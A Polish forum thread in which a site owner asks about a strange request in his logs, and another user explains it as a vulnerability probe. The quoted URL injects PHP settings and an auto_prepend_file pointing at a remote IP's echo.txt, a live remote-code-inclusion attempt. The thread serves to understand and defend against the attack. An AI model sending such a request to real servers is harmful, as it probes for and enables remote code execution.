Dziwne parametry w linku Opcje

[andrew654]

Witam

Zauważyłem że ktoś odwiedza moją stronę z takimi parametrami zawartymi w linku:
/index.php?-dsafe_mode?Off+-ddisable_functions?NULL+-dallow_url_fopen?On+-dallow_url_include?On+-dauto_prepend_file?http://178.63.8.214/echo.txt

Czy ktoś może mi pomóc rozszyfrować o co chodzi?

Prawdopodobnie próbuje obejść zabezpieczenia i włączyć otwieranie plików przez url.
Nie wiem tylko czemu służy ten plik echo.txt, w którym jest kawałek kodu php:

<?php echo "dsfer34w5rlsidfosdedfpsd";?>

Może ktoś już miał z tym styczność i wie co kryje się za magicznym ciągiem znaków: dsfer34w5rlsidfosdedfpsd

Będę wdzięczny za pomoc, pozdrawiam:)

[webdice]

Atakujący próbuje dołączyć plik echo.txt. Jeśli mu się uda, na stronie pojawi się tekst wyświetlany przez funkcje echo. Na tej podstawie będzie wiedział czy strona jest podatna na ataki.

[andrew654]

Atakujący próbuje dołączyć plik echo.txt. Jeśli mu się uda, na stronie pojawi się tekst wyświetlany przez funkcje echo. Na tej podstawie będzie wiedział czy strona jest podatna na ataki.

Dzięki:)
Czyli ciąg: dsfer34w5rlsidfosdedfpsd jest po prostu elementem unikalnym, który na pewno nigdzie na stronie się nie pojawia i będzie wiedział, że udało mu się coś dołączyć do strony skanując jej źródło

[webdice]

(...) który na pewno nigdzie na stronie się nie pojawia i będzie wiedział, że udało mu się coś dołączyć do strony skanując jej źródło

Możesz go sobie szukać w źródle i go nie znajdziesz. Ten ciąg pojawi się (tylko w tym jednym żądaniu) wtedy gdy ktoś odwiedzi stronę z takimi parametrami, a strona jest podatna na tego typu atak (oczywiście jest to też kwestia konfiguracji serwera).

To nie tak że jak nie znajdziesz tego ciągu w źródle strony to jesteś bezpieczny.